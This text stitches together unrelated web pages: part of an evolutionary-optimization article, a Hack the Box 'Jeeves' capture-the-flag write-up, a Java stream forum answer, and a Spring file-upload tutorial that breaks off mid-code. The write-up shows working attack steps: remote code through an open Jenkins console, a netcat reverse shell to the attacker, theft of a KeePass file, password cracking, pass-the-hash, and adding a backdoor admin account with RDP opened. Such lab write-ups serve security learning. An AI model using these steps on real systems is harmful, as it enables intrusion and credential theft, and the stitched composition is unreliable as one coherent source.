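The ComputeOutput() and Error() helpers referenced in Listing 1 aren't shown in the article; conceptually, ComputeOutput() applies the weights and logistic sigmoid to one data item, and Error() computes mean squared error over the whole training set. A Python sketch of the idea (the names mirror the C# helpers, but this code is mine, not the demo's):

```python
import math

def compute_output(x, wts):
    # convention: the last cell of wts holds the bias
    z = sum(xi * wi for xi, wi in zip(x, wts[:-1])) + wts[-1]
    return 1.0 / (1.0 + math.exp(-z))   # logistic sigmoid

def error(data_x, data_y, wts):
    # mean squared error between computed p-values and the 0/1 targets
    total = 0.0
    for x, y in zip(data_x, data_y):
        total += (compute_output(x, wts) - y) ** 2
    return total / len(data_x)

# with all-zero weights every p-value is exactly 0.5,
# so for targets 0 and 1 the mean squared error is 0.25
print(error([[1.0, 2.0], [3.0, 4.0]], [0, 1], [0.0, 0.0, 0.0]))  # 0.25
```

Whether the bias is stored as the last cell (as here) or separately is just a convention; the demo's five-value solution vector suggests the combined form.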
The code to create a child solution from two parent solutions is:

static double[] MakeChild(double[][] pop, int[] parents, Random rnd)
{
  int nw = pop[0].Length;     // num wts including bias
  int idx = rnd.Next(1, nw);  // crossover
  double[] child = new double[nw];
  for (int j = 0; j < idx; ++j)
    child[j] = pop[parents[0]][j];  // left
  for (int j = idx; j < nw; ++j)
    child[j] = pop[parents[1]][j];  // right
  return child;
}

The child contains the values of parent1 from index [0] up to, but not including, a randomly generated crossover index, and the values of parent2 from the crossover index to the last cell.

The code to mutate a newly created child solution is defined in function Mutate():

static void Mutate(double[] child, double mRate, Random rnd)
{
  double lo = -1.0; double hi = 1.0;
  for (int i = 0; i < child.Length; ++i)
  {
    double p = rnd.NextDouble();
    if (p < mRate)  // rarely
      child[i] = (hi - lo) * rnd.NextDouble() + lo;
  }
  return;
}

The function traverses a child solution and modifies each cell independently with probability mRate. Because the function modifies its child parameter directly, I use an explicit return statement as a form of documentation.

Wrapping Up
Evolutionary optimization is a meta-heuristic, meaning the technique is a set of general guidelines rather than a rigid algorithm. This means you have many design choices, such as creating two children at a time instead of one, using two crossover points instead of one when creating a child, and so on. Based on my experience with evolutionary optimization, simplicity is a better approach than sophistication.

Evolutionary optimization can be used to train any kind of machine learning model that has a well-defined solution and a way to compute error for a solution. In particular, evolutionary optimization can be used to train a neural network or any kernel-based model. The main advantage of evolutionary optimization is that, unlike many machine learning training algorithms, it does not require a Calculus gradient.
The main disadvantage of evolutionary optimization is that it usually requires far more processing time than gradient-based techniques.

Evolutionary optimization has existed for many years, but there's been renewed interest in the technique recently. Even though I have no solid survey data, there seems to be a growing sense among researchers that regular deep neural networks, which rely on Calculus gradients, are reaching the limits of their capabilities. New approaches, such as neuromorphic computing, are gaining increased attention. Many of these newer approaches cannot use gradients, and so evolutionary optimization is one possible option for training them.
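To make the meta-heuristic concrete, the pieces described above (random initialization, crossover, mutation, replacement, immigration) can be combined into a compact, self-contained Python sketch applied to a toy minimization problem. This is an illustration of the general technique, not a port of the article's C# demo; all names and the toy error function are mine:

```python
import random

def make_solution(n, rnd, lo=-1.0, hi=1.0):
    # random vector, each cell in [lo, hi]
    return [(hi - lo) * rnd.random() + lo for _ in range(n)]

def make_child(p1, p2, rnd):
    idx = rnd.randrange(1, len(p1))   # single crossover point
    return p1[:idx] + p2[idx:]        # left of p1, right of p2

def mutate(child, m_rate, rnd, lo=-1.0, hi=1.0):
    for i in range(len(child)):
        if rnd.random() < m_rate:     # rarely
            child[i] = (hi - lo) * rnd.random() + lo

def evolve(err_fn, n, pop_size, max_gen, m_rate, rnd):
    pop = [make_solution(n, rnd) for _ in range(pop_size)]
    errs = [err_fn(s) for s in pop]
    for _ in range(max_gen):
        # tournament-style: pick the two best of a random half
        half = rnd.sample(range(pop_size), pop_size // 2)
        half.sort(key=lambda i: errs[i])
        child = make_child(pop[half[0]], pop[half[1]], rnd)
        mutate(child, m_rate, rnd)
        worst = max(range(pop_size), key=lambda i: errs[i])
        pop[worst], errs[worst] = child, err_fn(child)
        # immigration: replace another bad solution with a random one
        imm = make_solution(n, rnd)
        worst = max(range(pop_size), key=lambda i: errs[i])
        pop[worst], errs[worst] = imm, err_fn(imm)
    best = min(range(pop_size), key=lambda i: errs[i])
    return pop[best], errs[best]

# toy target: minimize the sum of squares (optimum at the zero vector)
rnd = random.Random(1)
best, err = evolve(lambda s: sum(v * v for v in s), 5, 6, 500, 0.1, rnd)
print(round(err, 4))
```

Swapping the toy error function for a mean-squared-error function over training data turns this sketch into a (slow but gradient-free) logistic regression trainer in the spirit of the article.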
https://visualstudiomagazine.com/articles/2020/02/21/evolutionary-optimization.aspx
{Hack the Box} Jeeves Write-Up

Three cheers for corporate malware. The year is 2005. Avatar: The Last Airbender has just started airing. The sweet melody of asphyxiating cows plays in the background as you try to start your dial-up connection. Obi Wan gets the high ground, but Palpatine gets the last laugh. Ask Jeeves had a special place in our hearts. Glory days. I shall wax nostalgic no longer. In the words of Nicko, let's get stuck into this bad boy.

Initial Scans

POOOOOORT SCAN.

root@kali:~# nmap -sC -sV -o nmap.log 10.10.10.63
Starting Nmap 7.60 ( ) at 2018-05-23 16:32 EDT
Nmap scan report for 10.10.10.63
Host is up (0.043s latency).
Not shown: 996
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h58m52s, deviation: 0s, median: 4h58m52s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2018-05-23 21:31:56
|_  start_date: 2018-05-21 00:40:49

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 54.33 seconds

Put on a full port scan in the background too. Good habit to get used to. We've got two HTTP ports and some SMB going on here. ALSO WE'RE DEALING WITH WINDOWS. Hyperventilate at your leisure.

We can try visiting both HTTP ports to see what we get. Start with port 80. Wow. Flashbacks to when Norton Antivirus sneakily installed Ask Jeeves and Internet Explorer 6 vomited toolbars. *shudder*.

Seems like we've been had. Your world is a lie. They're all dummy links. And the search bar directs us to error.html every time. This screenshot (assuming it's legit) actually tells us a lot about the target machine: the Windows version and build number, ASP.NET version, SQL server version, and you get the idea.
In any penetration test, knowing the version numbers of a bunch of different software on a target machine is incredibly valuable. You can use it to look up any existing vulnerabilities or potential misconfigurations. DuckDuckGo is your friend. Google is evil now so it's an unwilling accomplice at best. Right now though, we can't really use any of this information since we don't have any related open ports. Once we get some kind of user access to Jeeves though, we might need this information, so jot it down somewhere.

Port 50000 doesn't have much to show for itself either. We do get another piece of info though: the web server type and version. A quick Google (*ahem* DDG) search for Jetty doesn't really give us any juicy exploits, so we'll table it for now, and come back to it if we get really stuck later.

This is where I start throwing dictionaries. Let's set up a couple Gobuster sessions on the two HTTP ports (80, 50000) so we can maybe find some tasty directories, and while they marinate, we can go ahead and mess around with SMB a bit.

root@kali:~# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.63

Gobuster v1.2
OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   :
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
=====================================================
=====================================================

The Server Message Block (SMB) protocol is a way to access shared files and printers and stuff on another network node. Usually used on Windows, but Unix systems have their own implementation (Samba). Kali has a few good tools installed to enumerate and interact with SMB ports. smbclient is useful if you need to list the shares available to you, along with user access permissions, and then actually access files.
But before doing all that, we can use a handy script called enum4linux to give us a detailed overview. This also lets us know if we can access any accounts in the first place. I'll save you the trouble here and say that this seems like a dead end.

root@kali:~# enum4linux -a 10.10.10.63
Starting enum4linux v0.8.9 ( ) on Wed May 23 18:46:19 2018

==========================
|  Target Information    |
==========================
Target ........... 10.10.10.63
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

===================================================
|  Enumerating Workgroup/Domain on 10.10.10.63    |
===================================================
[E] Can't find workgroup/domain

===========================================
|  Nbtstat Information for 10.10.10.63    |
===========================================
Looking up status of 10.10.10.63
No reply from 10.10.10.63

====================================
|  Session Check on 10.10.10.63    |
====================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

Oh well. Back to Gobuster. Port 80 doesn't really have anything interesting, but if we look at port 50000, we get something funny.

=====================================================
/askjeeves (Status: 302)
=====================================================

Let's check it out. 302 is a redirect HTTP code in case you haven't seen it before. Strap yourselves in.

Jenkins? Groovy. Ask not what Jeeves can do for you. Not a very eventful ride. The redirect just added a forward slash. Quaint. BUT OMG, A JENKINS SERVER. And what's more, we don't even have to log in. We've got full access here. y i k e s. Look around a bit.
Jenkins is an automation server so it’s sure to have some sort of direct access to the underlying machine. If you go to Manage Jenkins option under the top left menu, you’ll see a script console. Looks promising. Yep. Okay. Now you can go spend the next few days learning how to program in Groovy. Fun! Seriously though, it’s just like Java, but easier. If you can Java, you can Groovy. This looks like a tender spot, so let’s try to get some code execution going. It’s Windows, so keep that in mind when you write out commands. Groovy has a useful method to execute strings as shell commands called execute(). Let’s use that to see if we can get a directory list. This took a little tinkering to get right, but we’ve got code execution. Groovy Console: def cmd = "cmd.exe /c dir".execute(); println("${cmd.text}"); Result: Volume in drive C has no label. Volume Serial Number is BE50-B1C9 Directory of C:\Users\Administrator\.jenkins 05/21/2018 12:42 AM <DIR> . 05/21/2018 12:42 AM <DIR> .. 05/24/2018 05:26 AM 47 .owner 05/21/2018 12:42 AM 1,684 config.xml 05/21/2018 12:42 AM 156 hudson.model.UpdateCenter.xml 11/03/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml 11/03/2017 10:33 PM 1,712 identity.key.enc 11/03/2017 10:46 PM 94 jenkins.CLI.xml 05/24/2018 04:54 AM 83,489 jenkins.err.log 11/03/2017 10:47 PM 360,448 jenkins.exe 11/03/2017 10:47 PM 331 jenkins.exe.config 05/21/2018 12:42 AM 4 jenkins.install.InstallUtil.lastExecVersion 11/03/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state 11/03/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml 12/24/2017 03:38 PM 2,688 jenkins.out.log 05/21/2018 12:41 AM 4 jenkins.pid 11/03/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml 11/03/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml 11/03/2017 10:47 PM 74,271,222 jenkins.war 05/21/2018 12:41 AM 34,147 jenkins.wrapper.log 11/03/2017 10:49 PM 2,881 jenkins.xml 11/03/2017 10:33 PM <DIR> jobs 11/03/2017 10:33 PM <DIR> logs 05/21/2018 12:42 
AM 907 nodeMonitors.xml 11/03/2017 10:33 PM <DIR> nodes 11/03/2017 10:44 PM <DIR> plugins 11/03/2017 10:47 PM 129 queue.xml.bak 11/03/2017 10:33 PM 64 secret.key 11/03/2017 10:33 PM 0 secret.key.not-so-secret 12/24/2017 03:47 AM <DIR> secrets 11/08/2017 09:52 AM <DIR> updates 11/03/2017 10:33 PM <DIR> userContent 11/03/2017 10:33 PM <DIR> users 11/03/2017 10:47 PM <DIR> war 11/03/2017 10:43 PM <DIR> workflow-libs 23 File(s) 74,760,854 bytes 12 Dir(s) 7,523,225,600 bytes free Excellent. Now I’d suggest taking a break. Sitting kills, people. Go make fried chicken or something. Alright, we’re back from our commercial break. Let’s get a reverse shell. Apparently Jeeves has PowerShell installed so that makes our job easier. Start up a web server on your local machine and put a copy of an nc.exe binary nearby where you won’t lose it. Along with netcat, Kali has a bunch of other cool Windows binaries for penetration testing stuff in /usr/share/windows-binaries. Look through it when you get the chance. If you don’t have it on your machine, just find it on the internet. The Windows machine we’re targeting is 32-bit so make sure the binary you use is also 32-bit. root@kali:~# ls -la /usr/share/windows-binaries/ total 1908 drwxr-xr-x 9 root root 4096 Feb 4 14:39 . drwxr-xr-x 472 root root 20480 May 21 18:24 .. 
drwxr-xr-x 2 root root 4096 Feb 4 14:39 backdoors drwxr-xr-x 2 root root 4096 Feb 4 14:39 enumplus -rwxr-xr-x 1 root root 53248 Aug 21 2017 exe2bat.exe drwxr-xr-x 2 root root 4096 Feb 4 14:39 fgdump drwxr-xr-x 2 root root 4096 Feb 4 14:39 fport drwxr-xr-x 5 root root 4096 Feb 4 14:39 hyperion -rwxr-xr-x 1 root root 23552 Aug 21 2017 klogger.exe drwxr-xr-x 2 root root 4096 Feb 4 14:39 mbenum drwxr-xr-x 4 root root 4096 Feb 4 14:39 nbtenum -rwxr-xr-x 1 root root 59392 Aug 21 2017 nc.exe //YEE -rwxr-xr-x 1 root root 311296 Aug 21 2017 plink.exe -rwxr-xr-x 1 root root 704512 Aug 21 2017 radmin.exe -rwxr-xr-x 1 root root 364544 Aug 21 2017 vncviewer.exe -rwxr-xr-x 1 root root 308736 Aug 21 2017 wget.exe -rwxr-xr-x 1 root root 66560 Aug 21 2017 whoami.exe root@kali:~/Documents/oscp/tools/windows_binaries# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... Most of the time, netcat use is restricted or nonexistent on Windows machines, so it’s far easier to just upload our own and create TCP connections to our heart’s content. Back to the Groovy script console. Use the Powershell Invoke-WebRequest cmdlet (wget is so much less verbose, jeez) to grab netcat from your local machine. Groovy Console: def process = "powershell -command Invoke-WebRequest '' -OutFile nc.exe".execute(); println("${process.text}"); Make sure to write your own IP address connected to the tun0 interface (viewable with ifconfig). We need -OutFile to specify that we want to save the file contents to nc.exe because Invoke-WebRequest outputs them to the pipeline by default. Your Python server should show that Jeeves got our present. root@kali:~# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 10.10.10.63 - - [24/May/2018 01:07:41] "GET /nc.exe HTTP/1.1" 200 - List the directory contents again to make sure it’s there. We can keep using PowerShell because we want to avoid the aging travesty that is the Windows command line. 
Groovy Console: def process = "powershell -command dir".execute(); println("${process.text}"); Result: Directory: C:\Users\Administrator\.jenkins Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/3/2017 10:33 PM jobs d----- 11/3/2017 10:33 PM logs d----- 11/3/2017 10:33 PM nodes d----- 11/3/2017 10:44 PM plugins d----- 12/24/2017 2:47 AM secrets d----- 11/8/2017 8:52 AM updates d----- 11/3/2017 10:33 PM userContent d----- 11/3/2017 10:33 PM users d----- 11/3/2017 10:47 PM war d----- 11/3/2017 10:43 PM workflow-libs -a---- 5/24/2018 5:26 AM 47 .owner -a---- 5/21/2018 12:42 AM 1684 config.xml -a---- 5/21/2018 12:42 AM 156 hudson.model.UpdateCenter.xml -a---- 11/3/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml -a---- 11/3/2017 10:33 PM 1712 identity.key.enc -a---- 11/3/2017 10:46 PM 94 jenkins.CLI.xml 5/24/2018 4:54 AM 83489 jenkins.err.log -a---- 11/3/2017 10:47 PM 360448 jenkins.exe -a---- 11/3/2017 10:47 PM 331 jenkins.exe.config -a---- 5/21/2018 12:42 AM 4 jenkins.install.InstallUtil.lastExecVersion -a---- 11/3/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state -a---- 11/3/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml 12/24/2017 2:38 PM 2688 jenkins.out.log -a---- 5/21/2018 12:41 AM 4 jenkins.pid -a---- 11/3/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml -a---- 11/3/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml -a---- 11/3/2017 10:47 PM 74271222 jenkins.war -a---- 5/21/2018 12:41 AM 34147 jenkins.wrapper.log -a---- 11/3/2017 10:49 PM 2881 jenkins.xml -a---- 5/24/2018 6:06 AM 59392 nc.exe -a---- 5/21/2018 12:42 AM 907 nodeMonitors.xml -a---- 11/3/2017 10:47 PM 129 queue.xml.bak -a---- 11/3/2017 10:33 PM 64 secret.key -a---- 11/3/2017 10:33 PM 0 secret.key.not-so-secret Great. Now let’s set up a netcat listener on our local machine and connect back to it from the script console. root@kali:~# nc -lnvp 1337 listening on [any] 1337 ... 
Groovy Console:

def process = "powershell -command ./nc.exe 10.10.14.5 1337 -e cmd.exe".execute(); //CHANGE IP PLS
println("${process.text}");

Run it and check your listener.

root@kali:~# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49678
Microsoft Windows [Version 10.0.10586]

C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke

C:\Users\Administrator\.jenkins>

Delicious.

Windows irks me

Start off by invading Kohsuke's privacy and rifling through his stuff. His Documents folder contains something interesting: a file named CEH.kdbx.

A quick Google (sigh) search shows us that the .kdbx extension is most commonly used as a KeePass Password Database data file. Nice. It's probably got some interesting credentials in there. Let's get it onto our system with netcat file transfer witchery.

Set up a listener on your local machine that redirects data to a .kdbx file.

root@kali:~# nc -lnvp 4444 > CEH.kdbx
listening on [any] 4444 ...

Now on the command line for Jeeves, use the uploaded nc.exe to transfer the contents of CEH.kdbx to your machine.

C:\Users\kohsuke\Documents>C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx
C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx

Your listener should have received the incoming connection. If so, exit netcat and you'll see the file.

root@kali:~# nc -lnvp 4444 > CEH.kdbx
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49693
^C
root@kali:~# ls -la CEH.kdbx
-rw-r--r-- 1 root root 2846 May 23 02:08 CEH.kdbx
root@kali:~#

Great. Download KeePass if you don't already have it.

root@kali:~# apt search keepass
Sorting... Done
Full Text Search...
Done
keepass2/kali-rolling 2.38+dfsg-1 all
  Password manager
keepass2-doc/kali-rolling 2.38+dfsg-1 all
  Password manager - Documentation
keepassx/kali-rolling,now 2.0.3-1 i386 [installed]
  Cross Platform Password Manager
keepassxc/kali-rolling 2.3.1+dfsg.1-1 i386
  Cross Platform Password Manager
kpcli/kali-rolling 3.1-3 all
  command line interface to KeePassX password manager databases
libfile-keepass-perl/kali-rolling 2.03-1 all
  interface to KeePass V1 and V2 database files

root@kali:~# apt install keepassx
...

Open the KeePass file.

root@kali:~/Documents/hack_the_box/jeeves# keepassx CEH.kdbx

We shall not pass. We need a password. Let's smash it. Luckily Kali saves our asses once again (I laughed when I saw there's a keepass2john program. I love this).

root@kali:~# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
root@kali:~#

Alright. We now have a hash, and, ignoring the name, we can now use hashcat to crack it. Save the hash to a text file. You'll notice that the hash is invalid. Check out a list of hash examples to see that KeePass hashes start with $keepass$, and not CEH: (kind of obvious in hindsight). Remove that part. Now actually crack it.

*5 minutes later*

Nvm. It broke my laptop. Pro tip: don't use the force option when hashcat tells you it's a bad idea. My Kali Linux partition is no longer booting. Sigh. Sorry John. I still love you and stuff. Take me back, pls.
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt keepass-hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/32 OpenSSL]) Press 'q' or Ctrl-C to abort, almost any other key for status moonshine1 (CEH) 1g 0:00:01:37 DONE (2018-05-26 03:38) 0.01027g/s 564.7p/s 564.7c/s 564.7C/s moonshine1 Use the "--show" option to display all of the cracked passwords reliably Session completed root@kali:~# Aaaand the password is moonshine1. Fire up KeePass again and enter the password. WOOH, got the password to his Walmart account. I kinda needed a few bags of potting soil and 4-ply toilet paper. Let’s use winexe to try to log in as admin with all these passwords. The most promising seems like the one under Backup stuff, which looks like a Windows NTLM hash. For this, we can use pth-winexe to pass in the hash directly to log in. No need to crack it. Scary stuff. root@kali:~# pth-winexe winexe version 1.1 This program may be freely redistributed under the terms of the GNU GPLv3 Usage: winexe [OPTION]... //HOST COMMAND Options: -h, --help Display help message -V, --version Display version number -U, --user=[DOMAIN/]USERNAME[%PASSWORD] Set the network username -A, --authentication-file=FILE Get the credentials from a file -N, --no-pass Do not ask for a password -k, --kerberos=STRING Use Kerberos, -k [yes|no] -d, --debuglevel=DEBUGLEVEL Set debug level --uninstall Uninstall winexe service after remote execution --reinstall Reinstall winexe service before remote execution --system Use SYSTEM account --profile Load user profile --convert Try to convert characters between local and remote code-pages --runas=[DOMAIN\]USERNAME%PASSWORD Run as the given user (BEWARE: this password is sent in cleartext over the network!) --runas-file=FILE Run as user options defined in a file --interactive=0|1 Desktop interaction: 0 - disallow, 1 - allow. If allow, also use the --system switch (Windows requirement). Vista does not support this option. 
--ostype=0|1|2 OS type: 0 - 32-bit, 1 - 64-bit, 2 - winexe will decide. Determines which version (32-bit or 64-bit) of service will be installed. root@kali:~#... Microsoft Windows [Version 10.0.10586] C:\Windows\system32>whoami whoami nt authority\system <------------ yah C:\Windows\system32> Successfully hacked. Now let’s grab the flags the fun way. I had no idea this was a thing until I started my OSCP practice. Mind was sufficiently blown. Through the Jeeves command line, make an account for yourself with admin privileges (Please don’t do this in a real environment. Use already existing accounts if you have to. And opening up a remote desktop port is pretty conspicuous. It’s just more fun this way). C:\Windows\system32>net user /add oneeb jeeved net user /add oneeb jeeved The command completed successfully. C:\Windows\system32>net localgroup administrators oneeb /add net localgroup administrators oneeb /add The command completed successfully. C:\Windows\system32> Now start up the Remote Desktop (RDP) service. C:\Windows\system32>reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 The operation completed successfully. C:\Windows\system32> Configure the firewall to let RDP connections in. C:\Windows\system32>netsh firewall set service remoteadmin enable netsh firewall set service remoteadmin enable Ok. C:\Windows\system32>netsh firewall set service remotedesktop enable netsh firewall set service remotedesktop enable Ok. C:\Windows\system32> Now use rdesktop on Kali to log in to your newly minted account. root@kali:~# rdesktop 10.10.10.63 Connection established using SSL. Enter your username and password and log in. Tah-dah. Beautiful isn’t it? Play around with it to your heart’s content. Now go to the admin desktop and grab that flag so I can sleep. Copy that file to your desktop so you can read it. 
Knickers twisted. I'm stumped. Since the root.txt file is always on the Administrator desktop, and there doesn't seem to be some network inception stuff going on, let's take a deeper look at the file with PowerShell. Make sure to run it as admin or you're going to have a bad time.

Start by taking a look at Alternate Data Streams (ADS). MalwareBytes has a really good basic introduction to it. Basically, ADS is a way for you to add data to a file that's hidden from normal means of viewing, like through file explorer or printing the file out on a command line. You've got to use special directives to view these streams, and it's very easy for them to fly under the radar. They often get a bad rep because so much malware takes advantage of this. Note that these streams are a feature of the Windows New Technology File System (NTFS), so transferring the file to your Linux system, or even a FAT32 Windows file system, will erase any streams the file may have.

Anyway, let's check to see if hm.txt has any other streams. Bingo. Read the contents of root.txt.

PS C:\Users\oneeb\Desktop> get-content .\hm.txt -stream root.txt
r00t_ha$h_th1ngi3
PS C:\Users\oneeb\Desktop>

Done. Just make sure to delete your user account so Jeeves doesn't axe murder you. Nighty night.

This box was a doozy, if only because I hadn't really done too much Windows hacking before. The OSCP PwK course gave me a good introduction, and banging my head against this box as I surfed the interwebs taught me quite a bit. Windows privilege escalation throws me for a loop sometimes. The FuzzySecurity guide to Windows priv. esc. really helped me develop a solid attack plan for when I'm stuck with a user account. Be sure to check it out!

If you found this informative, be on the lookout for more write-ups. You can follow me on Twitter for the latest. Shoot me a message if you ever have any questions about how to get started in InfoSec. I'd be glad to help in any way that I can. Happy hacking!
https://medium.com/@OneebMalik/hack-the-box-jeeves-write-up-f1427462dc19
in data. You can use InputStreamReader to read in data, and readLine() will work just fine. In JDK 1.1, we can add additional filters to the input stream to enhance its capabilities. BufferedReader, for example, will allow you to buffer the incoming bits. This allows for fewer read operations from the source and improves efficiency. Therefore, to read from the standard input, the following two lines will be what you want:

    BufferedReader in = new BufferedReader(new InputStreamReader(System.in));
    String s = in.readLine();

As you can see, InputStreamReader could have done the job of reading the data. However, piping it through the buffered reader adds more efficiency to it. For an even more involved example of chaining multiple filters, try this program out:

    import java.io.*;

    class Lines {
        static String fileName = "test.in";

        public static void main(String[] args) {
            try {
                FileInputStream in = new FileInputStream(fileName);
                LineNumberInputStream lineIn;
                lineIn = new LineNumberInputStream(in);
                DataInputStream dataIn = new DataInputStream(lineIn);
                while (dataIn.available() > 0) {
                    String s = dataIn.readLine();
                    int lineNum = lineIn.getLineNumber();
                    System.out.println("Line " + lineNum + ": " + s);
                }
            } catch (IOException x) {
                System.out.println(x.getMessage());
            }
        }
    }

Take a look, I'm sure you'll see how it works. If not, just post a message and I'll explain.
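As a side note, DataInputStream.readLine() and LineNumberInputStream were later deprecated because byte streams mishandle character encodings when used for line-oriented text. The same chaining idea works with the reader classes: LineNumberReader both buffers and counts lines. The sketch below is my own reader-based rewrite of the Lines program above (it writes its own tiny test.in so it is self-contained).

```java
import java.io.BufferedWriter;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.IOException;
import java.io.LineNumberReader;
import java.io.UncheckedIOException;
import java.util.ArrayList;
import java.util.List;

public class LinesWithReaders {

    // Reader-based version of Lines: LineNumberReader buffers the input
    // and tracks line numbers, so no deprecated stream classes are needed.
    static List<String> numberLines(String fileName) {
        List<String> out = new ArrayList<>();
        try (LineNumberReader in = new LineNumberReader(new FileReader(fileName))) {
            String s;
            while ((s = in.readLine()) != null) {
                out.add("Line " + in.getLineNumber() + ": " + s);
            }
        } catch (IOException x) {
            throw new UncheckedIOException(x);
        }
        return out;
    }

    public static void main(String[] args) {
        // Write a tiny sample file so the example runs anywhere.
        try (BufferedWriter w = new BufferedWriter(new FileWriter("test.in"))) {
            w.write("alpha\nbeta\n");
        } catch (IOException x) {
            throw new UncheckedIOException(x);
        }
        for (String line : numberLines("test.in")) {
            System.out.println(line);  // Line 1: alpha / Line 2: beta
        }
    }
}
```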
https://www.experts-exchange.com/questions/10071154/readLine-and-DataInputStream-vs-BufferedReader.html
In this simple tutorial we will see how to implement multiple file upload in a Spring 3 MVC based application. The requirement is simple: we have a form which displays a file input component, the user selects a file and uploads it, and it is also possible to add more file input components using an Add button. Once the files are selected and uploaded, the file names are displayed on a success page.

1. Maven Dependencies / Required JAR files

If you are using Maven in your project for dependency management, you'll need to add dependencies for the Apache Commons FileUpload and Apache Commons IO libraries. Spring's CommonsMultipartResolver class internally uses these libraries to handle uploaded content. Add the following dependencies in your Maven based project to add the file upload feature.

<dependencies>
    <!-- Spring 3 MVC -->
    <dependency>
        <groupId>org.springframework</groupId>
        <artifactId>spring-webmvc</artifactId>
        <version>3.1.2.RELEASE</version>
    </dependency>
    <!-- Apache Commons file upload -->
    <dependency>
        <groupId>commons-fileupload</groupId>
        <artifactId>commons-fileupload</artifactId>
        <version>1.2.2</version>
    </dependency>
    <!-- Apache Commons IO -->
    <dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-io</artifactId>
        <version>1.3.2</version>
    </dependency>
    <!-- JSTL for c: tag -->
    <dependency>
        <groupId>jstl</groupId>
        <artifactId>jstl</artifactId>
        <version>1.2</version>
    </dependency>
</dependencies>

If you have a simple web application, add the corresponding JAR files in the WEB-INF/lib folder. You can download all these JARs with the source code at the end of this tutorial.

2. Form Bean – FileUploadForm.java

FileUploadForm.java

package net.viralpatel.spring3.form;

import java.util.List;
import org.springframework.web.multipart.MultipartFile;

public class FileUploadForm {

    private List<MultipartFile> files;

    //Getter and setter methods
}

3. Controller – Spring Controller

Create a Spring 3 MVC based controller which handles the file upload. There are two methods in this controller:

displayForm – Used to show the input form to the user.
It simply forwards to the page file_upload_form.jsp.

save – Fetches the form using the @ModelAttribute annotation and gets the file content from it. It creates a list of filenames of the files being uploaded and passes this list to the success page.

FileUploadController.java

package net.viralpatel.spring3.controller;

import java.util.ArrayList;
import java.util.List;

import net.viralpatel.spring3.form.FileUploadForm;

import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.ModelAttribute;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.multipart.MultipartFile;

@Controller
public class FileUploadController {

    @RequestMapping(value = "/show", method = RequestMethod.GET)
    public String displayForm() {
        return "file_upload_form";
    }

    @RequestMapping(value = "/save", method = RequestMethod.POST)
    public String save(
            @ModelAttribute("uploadForm") FileUploadForm uploadForm,
            Model map) {

        List<MultipartFile> files = uploadForm.getFiles();
        List<String> fileNames = new ArrayList<String>();

        if (null != files && files.size() > 0) {
            for (MultipartFile multipartFile : files) {
                String fileName = multipartFile.getOriginalFilename();
                fileNames.add(fileName);
                //Handle file content - multipartFile.getInputStream()
            }
        }

        map.addAttribute("files", fileNames);
        return "file_upload_success";
    }
}

4. View – JSP views

Now create the view pages for this application. We will need two JSPs: one to display the file upload form and another to show the result on successful upload. The file_upload_form.jsp displays a form with a file input. Apart from this we have added a small jQuery snippet on click of the Add button. This will add a new file input component at the end of the form. This allows users to upload as many files as they want (subject to the file size limit, of course). Note that we have set the enctype="multipart/form-data" attribute of our <form> tag.
file_upload_form.jsp

<[email protected]</script>
<script>
$(document).ready(function() {
    //add more file components if Add is clicked
    $('#addFile').click(function() {
        var fileIndex = $('#fileTable tr').children().length - 1;
        $('#fileTable').append(
            '<tr><td>'+
